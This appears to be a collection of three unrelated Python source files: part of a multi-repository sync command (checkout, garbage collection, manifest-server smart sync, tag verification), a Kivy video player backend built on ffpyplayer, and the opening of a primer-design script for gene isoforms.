err_event = _threading.Event()
for project in all_projects:
# Check for any errors before running any more tasks.
# ...we'll let existing threads finish, though.
if err_event.isSet() and opt.fail_fast:
break
sem.acquire()
if project.worktree:
kwargs = dict(opt=opt,
sem=sem,
project=project,
lock=lock,
pm=pm,
err_event=err_event)
if syncjobs > 1:
t = _threading.Thread(target=self._CheckoutWorker,
kwargs=kwargs)
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
else:
self._CheckoutWorker(**kwargs)
for t in threads:
t.join()
pm.end()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to checkout errors', file=sys.stderr)
sys.exit(1)
def _GCProjects(self, projects):
gc_gitdirs = {}
for project in projects:
if len(project.manifest.GetProjectsWithName(project.name)) > 1:
print('Shared project %s found, disabling pruning.' % project.name)
project.bare_git.config('--replace-all', 'gc.pruneExpire', 'never')
gc_gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gc_gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gc_gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def _DeleteProject(self, path):
print('Deleting obsolete path %s' % path, file=sys.stderr)
# Delete the .git directory first, so we're less likely to have a partially
# working git repository around. There shouldn't be any git projects here,
# so rmtree works.
try:
platform_utils.rmtree(os.path.join(path, '.git'))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(path, '.git'), str(e)), file=sys.stderr)
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return 1
# Delete everything under the worktree, except for directories that contain
# another git project
dirs_to_remove = []
failed = False
for root, dirs, files in platform_utils.walk(path):
for f in files:
try:
platform_utils.remove(os.path.join(root, f))
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, f), str(e)), file=sys.stderr)
failed = True
dirs[:] = [d for d in dirs
if not os.path.lexists(os.path.join(root, d, '.git'))]
dirs_to_remove += [os.path.join(root, d) for d in dirs
if os.path.join(root, d) not in dirs_to_remove]
for d in reversed(dirs_to_remove):
if platform_utils.islink(d):
try:
platform_utils.remove(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
elif len(platform_utils.listdir(d)) == 0:
try:
platform_utils.rmdir(d)
except OSError as e:
print('Failed to remove %s (%s)' % (os.path.join(root, d), str(e)), file=sys.stderr)
failed = True
continue
if failed:
print('error: Failed to delete obsolete path %s' % path, file=sys.stderr)
print(' remove manually, then run sync again', file=sys.stderr)
return 1
# Try deleting parent dirs if they are empty
project_dir = path
while project_dir != self.manifest.topdir:
if len(platform_utils.listdir(project_dir)) == 0:
platform_utils.rmdir(project_dir)
else:
break
project_dir = os.path.dirname(project_dir)
return 0
def UpdateProjectList(self, opt):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
# In reversed order, so subfolders are deleted before parent folder.
for path in sorted(old_project_paths, reverse=True):
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
gitdir = os.path.join(self.manifest.topdir, path, '.git')
if os.path.exists(gitdir):
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty() and opt.force_remove_dirty:
print('WARNING: Removing dirty project "%s": uncommitted changes '
'erased' % project.relpath, file=sys.stderr)
self._DeleteProject(project.worktree)
elif project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return 1
elif self._DeleteProject(project.worktree):
return 1
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def ValidateOptions(self, opt, args):
if opt.force_broken:
print('warning: -f/--force-broken is now the default behavior, and the '
'options are deprecated', file=sys.stderr)
if opt.network_only and opt.detach_head:
self.OptionParser.error('cannot combine -n and -d')
if opt.network_only and opt.local_only:
self.OptionParser.error('cannot combine -n and -l')
if opt.manifest_name and opt.smart_sync:
self.OptionParser.error('cannot combine -m and -s')
if opt.manifest_name and opt.smart_tag:
self.OptionParser.error('cannot combine -m and -t')
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
self.OptionParser.error('-u and -p may only be combined with -s or -t')
if None in [opt.manifest_server_username, opt.manifest_server_password]:
self.OptionParser.error('both -u and -p must be given')
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
smart_sync_manifest_name = "smart_sync_override.xml"
smart_sync_manifest_path = os.path.join(
self.manifest.manifestProject.worktree, smart_sync_manifest_name)
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if '@' not in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
# .netrc file does not exist or could not be opened
pass
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
auth = info.authenticators(parse_result.hostname)
if auth:
username, _account, password = auth
else:
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
transport = PersistentTransport(manifest_server)
if manifest_server.startswith('persistent-'):
manifest_server = manifest_server[len('persistent-'):]
try:
server = xmlrpc.client.Server(manifest_server, transport=transport)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'SYNC_TARGET' in env:
target = env['SYNC_TARGET']
[success, manifest_str] = server.GetApprovedManifest(branch, target)
elif 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = smart_sync_manifest_name
try:
f = open(smart_sync_manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError as e:
print('error: cannot write manifest to %s:\n%s'
% (smart_sync_manifest_path, e),
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
else: # Not smart sync or smart tag mode
if os.path.isfile(smart_sync_manifest_path):
try:
platform_utils.remove(smart_sync_manifest_path)
except OSError as e:
print('error: failed to remove existing smart sync override manifest: %s' %
e, file=sys.stderr)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
start = time.time()
success = mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags,
optimized_fetch=opt.optimized_fetch,
submodules=self.manifest.HasSubmodules,
clone_filter=self.manifest.CloneFilter)
finish = time.time()
self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK,
start, finish, success)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
start = time.time()
mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules)
clean = syncbuf.Finish()
self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL,
start, time.time(), clean)
if not clean:
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
if self.gitc_manifest:
gitc_manifest_projects = self.GetProjects(args,
missing_ok=True)
gitc_projects = []
opened_projects = []
for project in gitc_manifest_projects:
if project.relpath in self.gitc_manifest.paths and \
self.gitc_manifest.paths[project.relpath].old_revision:
opened_projects.append(project.relpath)
else:
gitc_projects.append(project.relpath)
if not args:
gitc_projects = None
if gitc_projects != [] and not opt.local_only:
print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name)
manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name)
if manifest_name:
manifest.Override(manifest_name)
else:
manifest.Override(self.manifest.manifestFile)
gitc_utils.generate_gitc_manifest(self.gitc_manifest,
manifest,
gitc_projects)
print('GITC client successfully synced.')
# The opened projects need to be synced as normal, therefore we
# generate a new args list to represent the opened projects.
# TODO: make this more reliable -- if there's a project name/path overlap,
# this may choose the wrong project.
args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd())
for path in opened_projects]
if not args:
return
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop fetching if the set of missing repos has not changed since the
# last fetch; otherwise we would keep retrying repos that can never be fetched.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList(opt):
sys.exit(1)
self._Checkout(all_projects, opt)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo.',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
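# Get()/Set() keep an exponential moving average of each project's fetch time,
# which the fetch phase uses to sort projects longest-first. With _ALPHA = 0.5
# the update is: new_estimate = 0.5 * latest_duration + 0.5 * previous_estimate,
# so, for example, a previous estimate of 40s and a latest fetch of 20s give 30s.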
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path)
try:
self._times = json.load(f)
finally:
f.close()
except (IOError, ValueError):
try:
platform_utils.remove(self._path)
except OSError:
pass
self._times = {}
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'w')
try:
json.dump(self._times, f, indent=2)
finally:
f.close()
except (IOError, TypeError):
try:
platform_utils.remove(self._path)
except OSError:
pass
# This is a replacement for xmlrpc.client.Transport that uses urllib and
# supports persistent-http[s]. Unlike the normal transport it cannot change
# hosts from request to request; the real URL is passed during initialization.
class PersistentTransport(xmlrpc.client.Transport):
def __init__(self, orig_host):
self.orig_host = orig_host
def request(self, host, handler, request_body, verbose=False):
with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy):
# Python doesn't understand cookies with the #HttpOnly_ prefix.
# Since we're only using them for HTTP, copy the file temporarily,
# stripping those prefixes away.
if cookiefile:
tmpcookiefile = tempfile.NamedTemporaryFile()
tmpcookiefile.write("# HTTP Cookie File")
try:
with open(cookiefile) as f:
for line in f:
if line.startswith("#HttpOnly_"):
line = line[len("#HttpOnly_"):]
tmpcookiefile.write(line)
tmpcookiefile.flush()
cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name)
try:
cookiejar.load()
except cookielib.LoadError:
cookiejar = cookielib.CookieJar()
finally:
tmpcookiefile.close()
else:
cookiejar = cookielib.CookieJar()
proxyhandler = urllib.request.ProxyHandler
if proxy:
proxyhandler = urllib.request.ProxyHandler({
"http": proxy,
"https": proxy })
opener = urllib.request.build_opener(
urllib.request.HTTPCookieProcessor(cookiejar),
proxyhandler)
url = urllib.parse.urljoin(self.orig_host, handler)
parse_results = urllib.parse.urlparse(url)
scheme = parse_results.scheme
if scheme == 'persistent-http':
scheme = 'http'
if scheme == 'persistent-https':
# If we're proxying through persistent-https, use http. The
# proxy itself will do the https.
if proxy:
scheme = 'http'
else:
scheme = 'https'
# Parse out any authentication information using the base class
host, extra_headers, _ = self.get_host_info(parse_results.netloc)
url = urllib.parse.urlunparse((
scheme,
host,
parse_results.path,
parse_results.params,
parse_results.query,
parse_results.fragment))
request = urllib.request.Request(url, request_body)
if extra_headers is not None:
for (name, header) in extra_headers:
request.add_header(name, header)
request.add_header('Content-Type', 'text/xml')
try:
response = opener.open(request)
except urllib.error.HTTPError as e:
if e.code == 501:
# We may have been redirected through a login process
# but our POST turned into a GET. Retry.
response = opener.open(request)
else:
raise
p, u = xmlrpc.client.getparser()
while 1:
data = response.read(1024)
if not data:
break
p.feed(data)
p.close()
return u.close()
def close(self):
pass
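# A minimal sketch of how a transport like this is plugged into an XML-RPC
# proxy (`manifest_server` below is a hypothetical placeholder URL, e.g. a
# persistent-https:// address, not something defined in this module):
#
#     transport = PersistentTransport(manifest_server)
#     server = xmlrpc.client.ServerProxy(manifest_server, transport=transport)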
|
video_ffpyplayer.py
|
'''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here are some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL2.
Now, you should have ffmpeg and sdl directories. In each, you should have an
'include', 'bin' and 'lib' directory, where e.g. for Windows, 'lib' contains
the .dll.a files, while 'bin' contains the actual dlls. The 'include' directory
holds the headers. The 'bin' directory is only needed if the shared libraries
are not already in the path. In the environment, define FFMPEG_ROOT and
SDL_ROOT, each pointing to the ffmpeg and SDL directories respectively. (If
you're using SDL2, the 'include' directory will contain an 'SDL2' directory,
which then holds the headers).
Once defined, download the ffpyplayer git repo and run
python setup.py build_ext --inplace
Finally, before running you need to ensure that ffpyplayer is in python's path.
.. note::
When kivy exits by closing the window while the video is playing,
it appears that the __del__ method of VideoFFPy
is not called. Because of this, the VideoFFPy object is not
properly deleted when kivy exits. The consequence is that because
MediaPlayer creates internal threads which do not have their daemon
flag set, when the main thread exits, it'll hang and wait for the other
MediaPlayer threads to exit. But since __del__ is not called to delete the
MediaPlayer object, those threads will remain alive, hanging kivy. What
this means is that you have to be sure to delete the MediaPlayer object
before kivy exits by setting it to None.
'''
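# A minimal sketch of the cleanup the note above recommends. The App subclass
# and the `self.video` attribute (assumed to hold a VideoFFPy instance) are
# hypothetical and only for illustration:
#
#     from kivy.app import App
#
#     class PlayerApp(App):
#         def on_stop(self):
#             # Release the player so MediaPlayer's non-daemon threads do not
#             # keep the process alive after the window closes.
#             self.video.unload()
#             self.video = None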
__all__ = ('VideoFFPy', )
try:
import ffpyplayer
from ffpyplayer.player import MediaPlayer
from ffpyplayer.tools import set_log_callback, get_log_callback
except:
raise
from threading import Thread
from kivy.clock import Clock, mainthread
from kivy.logger import Logger
from kivy.core.video import VideoBase
from kivy.graphics import Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.graphics.fbo import Fbo
from kivy.weakmethod import WeakMethod
import time
Logger.info('VideoFFPy: Using ffpyplayer {}'.format(ffpyplayer.version))
logger_func = {'quiet': Logger.critical, 'panic': Logger.critical,
'fatal': Logger.critical, 'error': Logger.error,
'warning': Logger.warning, 'info': Logger.info,
'verbose': Logger.debug, 'debug': Logger.debug}
def _log_callback(message, level):
message = message.strip()
if message:
logger_func[level]('ffpyplayer: {}'.format(message))
if not get_log_callback():
set_log_callback(_log_callback)
class VideoFFPy(VideoBase):
YUV_RGB_FS = """
$HEADER$
uniform sampler2D tex_y;
uniform sampler2D tex_u;
uniform sampler2D tex_v;
void main(void) {
float y = texture2D(tex_y, tex_coord0).r;
float u = texture2D(tex_u, tex_coord0).r - 0.5;
float v = texture2D(tex_v, tex_coord0).r - 0.5;
float r = y + 1.402 * v;
float g = y - 0.344 * u - 0.714 * v;
float b = y + 1.772 * u;
gl_FragColor = vec4(r, g, b, 1.0);
}
"""
_trigger = None
def __init__(self, **kwargs):
self._ffplayer = None
self._thread = None
self._next_frame = None
self._seek_queue = []
self._ffplayer_need_quit = False
self._trigger = Clock.create_trigger(self._redraw)
super(VideoFFPy, self).__init__(**kwargs)
def __del__(self):
self.unload()
def _player_callback(self, selector, value):
if self._ffplayer is None:
return
if selector == 'quit':
def close(*args):
self.unload()
Clock.schedule_once(close, 0)
def _get_position(self):
if self._ffplayer is not None:
return self._ffplayer.get_pts()
return 0
def _set_position(self, pos):
self.seek(pos)
def _set_volume(self, volume):
self._volume = volume
if self._ffplayer:
self._ffplayer.set_volume(self._volume)
def _get_duration(self):
if self._ffplayer is None:
return 0
return self._ffplayer.get_metadata()['duration']
@mainthread
def _do_eos(self):
if self.eos == 'pause':
self.pause()
elif self.eos == 'stop':
self.stop()
elif self.eos == 'loop':
self.position = 0
self.dispatch('on_eos')
@mainthread
def _change_state(self, state):
self._state = state
def _redraw(self, *args):
if not self._ffplayer:
return
next_frame = self._next_frame
if not next_frame:
return
img, pts = next_frame
if img.get_size() != self._size or self._texture is None:
self._size = w, h = img.get_size()
if self._out_fmt == 'yuv420p':
w2 = int(w / 2)
h2 = int(h / 2)
self._tex_y = Texture.create(
size=(w, h), colorfmt='luminance')
self._tex_u = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._tex_v = Texture.create(
size=(w2, h2), colorfmt='luminance')
self._fbo = fbo = Fbo(size=self._size)
with fbo:
BindTexture(texture=self._tex_u, index=1)
BindTexture(texture=self._tex_v, index=2)
Rectangle(size=fbo.size, texture=self._tex_y)
fbo.shader.fs = VideoFFPy.YUV_RGB_FS
fbo['tex_y'] = 0
fbo['tex_u'] = 1
fbo['tex_v'] = 2
self._texture = fbo.texture
else:
self._texture = Texture.create(size=self._size,
colorfmt='rgba')
# XXX FIXME
# self.texture.add_reload_observer(self.reload_buffer)
self._texture.flip_vertical()
self.dispatch('on_load')
if self._texture:
if self._out_fmt == 'yuv420p':
dy, du, dv, _ = img.to_memoryview()
if dy and du and dv:
self._tex_y.blit_buffer(dy, colorfmt='luminance')
self._tex_u.blit_buffer(du, colorfmt='luminance')
self._tex_v.blit_buffer(dv, colorfmt='luminance')
self._fbo.ask_update()
self._fbo.draw()
else:
self._texture.blit_buffer(
img.to_memoryview()[0], colorfmt='rgba')
self.dispatch('on_frame')
def _next_frame_run(self):
ffplayer = self._ffplayer
sleep = time.sleep
trigger = self._trigger
did_dispatch_eof = False
seek_queue = self._seek_queue
# fast path, if the source video is yuv420p, we'll use a glsl shader
# for buffer conversion to rgba
while not self._ffplayer_need_quit:
src_pix_fmt = ffplayer.get_metadata().get('src_pix_fmt')
if not src_pix_fmt:
sleep(0.005)
continue
if src_pix_fmt == 'yuv420p':
self._out_fmt = 'yuv420p'
ffplayer.set_output_pix_fmt(self._out_fmt)
self._ffplayer.toggle_pause()
break
if self._ffplayer_need_quit:
return
# wait until loaded or failed, shouldn't take long, but just to make
# sure metadata is available.
s = time.perf_counter()
while not self._ffplayer_need_quit:
if ffplayer.get_metadata()['src_vid_size'] != (0, 0):
break
# XXX what happens if it fails later?
if time.perf_counter() - s > 10.:
break
sleep(0.005)
if self._ffplayer_need_quit:
return
# we got all the information, now, get the frames :)
self._change_state('playing')
while not self._ffplayer_need_quit:
seek_happened = False
if seek_queue:
vals = seek_queue[:]
del seek_queue[:len(vals)]
percent, precise = vals[-1]
ffplayer.seek(
percent * ffplayer.get_metadata()['duration'],
relative=False,
accurate=precise
)
seek_happened = True
self._next_frame = None
# Get next frame if paused:
if seek_happened and ffplayer.get_pause():
ffplayer.set_volume(0.0) # Try to do it silently.
ffplayer.set_pause(False)
try:
# We don't know the exact number of frames to skip;
# this number worked fine on a couple of tested videos:
to_skip = 6
while True:
frame, val = ffplayer.get_frame(show=False)
# Exit loop on invalid val:
if val in ('paused', 'eof'):
break
# Exit loop on seek_queue updated:
if seek_queue:
break
# Wait for next frame:
if frame is None:
sleep(0.005)
continue
# Wait until we skipped enough frames:
to_skip -= 1
if to_skip == 0:
break
# Assuming the last frame is the current one, just get it:
frame, val = ffplayer.get_frame(force_refresh=True)
finally:
ffplayer.set_pause(bool(self._state == 'paused'))
ffplayer.set_volume(self._volume)
# Get next frame regular:
else:
frame, val = ffplayer.get_frame()
if val == 'eof':
sleep(0.2)
if not did_dispatch_eof:
self._do_eos()
did_dispatch_eof = True
elif val == 'paused':
did_dispatch_eof = False
sleep(0.2)
else:
did_dispatch_eof = False
if frame:
self._next_frame = frame
trigger()
else:
val = val if val else (1 / 30.)
sleep(val)
def seek(self, percent, precise=True):
if self._ffplayer is None:
return
self._seek_queue.append((percent, precise,))
def stop(self):
self.unload()
def pause(self):
if self._ffplayer and self._state != 'paused':
self._ffplayer.toggle_pause()
self._state = 'paused'
def play(self):
if self._ffplayer and self._state == 'paused':
self._ffplayer.toggle_pause()
self._state = 'playing'
return
self.load()
self._out_fmt = 'rgba'
ff_opts = {
'paused': True,
'out_fmt': self._out_fmt,
'sn': True,
'volume': self._volume,
}
self._ffplayer = MediaPlayer(
self._filename, callback=self._player_callback,
thread_lib='SDL',
loglevel='info', ff_opts=ff_opts)
# Disabled as an attempt to fix kivy issue #6210
# self._ffplayer.set_volume(self._volume)
self._thread = Thread(target=self._next_frame_run, name='Next frame')
self._thread.daemon = True
self._thread.start()
def load(self):
self.unload()
def unload(self):
if self._trigger is not None:
self._trigger.cancel()
self._ffplayer_need_quit = True
if self._thread:
self._thread.join()
self._thread = None
if self._ffplayer:
self._ffplayer = None
self._next_frame = None
self._size = (0, 0)
self._state = ''
self._ffplayer_need_quit = False
|
designTaggedPrimersForIsoforms.py
|
#!/usr/bin/env python
import sys
from numpy import ceil, log2
from operator import itemgetter
from classMFE import MFE, MFEOptions
from IsoformSignatureClasses import Signature, IsoformSignatureGenerator
from commonCGDB import associateIsoformsToTargetGenesPlusOldID, buildTargetIsoformPartsList, annotateAndOrderTargetIsoformParts
from Bio import SeqIO
from IsoformSignatureClasses import *
from multiprocessing import Process, Queue
def readTargetIsoformMRNAs(target_isoform_IDs, transcriptome_ref):
target_IDs, target_isoforms = set(), {}
with open(target_isoform_IDs, 'r') as ip:
for line in ip:
line = line.strip()
target_IDs.add(line)
for seq_record in SeqIO.parse(transcriptome_ref, "fasta"):
if (seq_record.id in target_IDs):
target_isoforms[seq_record.id] = str(seq_record.seq)
assert (len(target_IDs) == len(target_isoforms.keys()))
return target_isoforms
def writeSignatures(target_isoform_signature_with_primer_pair, isoformOID, output_file, output_gtf):
op = open(output_file, 'w')
op.write("IsoformID\tGeneSymbol\tStrand\tGenomicSignature\tTranscriptomicSignature\tAmpliconLength\tFP_Tm\tRP_Tm\tFP\tRP\tAmplicon\n")
for isoformID, potential_signature in target_isoform_signature_with_primer_pair.items():
fp, fp_tm, rp, rp_tm, strand = potential_signature.getPrimerPair()
transcriptID = potential_signature.getParentTranscript()
oID = isoformOID[transcriptID]
assert (isoformID == transcriptID)
signature_genomic = potential_signature.getSignatureTuple()
genomic_signature_str = "%s:%d-%d_%s" % tuple(signature_genomic[0:2] + signature_genomic[-2:])
signature_transcriptomic = potential_signature.getSignatureTupleInmRNACoords()
transcriptomic_signature_str = "%s:%d-%d,%s" % tuple(signature_transcriptomic[0:2] + signature_transcriptomic[-2:])
amplicon = potential_signature.getAmplicon()
op.write("%s\t%s\t%s\t%s\t%s\t%d\t%4.2f\t%4.2f\t%s\t%s\t%s\n" % \
(transcriptID, oID, strand, genomic_signature_str, transcriptomic_signature_str, len(amplicon), fp_tm, rp_tm, fp, rp, amplicon))
op.close()
print >> sys.stderr, "INFO: transcripts for which primer pairs were found:"
gtf = open(output_gtf, 'w')
gtf.write("track type=gtf name=Amplicons description=Amplicons visibility=full useScore=1\n")
for potential_signature in target_isoform_signature_with_primer_pair.values():
print >> sys.stderr, "\t%s" % potential_signature.parent_transcript
gtf_lines = potential_signature.getAmpliconGenomicCoords("gtf")
gtf.write("%s\n" % "\n".join(gtf_lines))
gtf.close()
def designPrimers(target_isoforms, isoforms_per_gene, isoform_parts_list, genome_ref, transcriptome_ref, fwd_tag, rev_tag, do_in_parallel=False):
primer3_param_sets = primer32ParamSets(1)
target_isoform_IDs = set(target_isoforms.keys())
target_isoform_signature_with_primer_pair = {}
transcriptomic_MFE = MFE(transcriptome_ref)
genomic_MFE = MFE(genome_ref)
mfe_options = MFEOptions()
num_isoforms_no_signature, num_isoforms_signature_but_no_primers = (0,0)
# Process each locus/gene in turn, but only need to find a signature for the isoforms in 'target_isoform_IDs'
for gene, locus_isoforms in isoforms_per_gene.items():
all_signature_generators = {}
for isoform in locus_isoforms:
isoform_mRNA_seq = None if not target_isoforms.has_key(isoform) else target_isoforms[isoform]
all_signature_generators[isoform] = IsoformSignatureGenerator(isoform, isoform_mRNA_seq, isoform_parts_list[isoform]["otp"], isoform_parts_list[isoform]["strand"])
this_locus_target_isoform_IDs = locus_isoforms.intersection(target_isoform_IDs)
# For each isoform in turn, find a signature, check for the best primers, then check for genomic specificity. TODO: add to
# class IsoformSignatureGenerator some clean way to say "exhausted signature options" so that I will know that what
# I've got to that point is the best I'll get to work with.
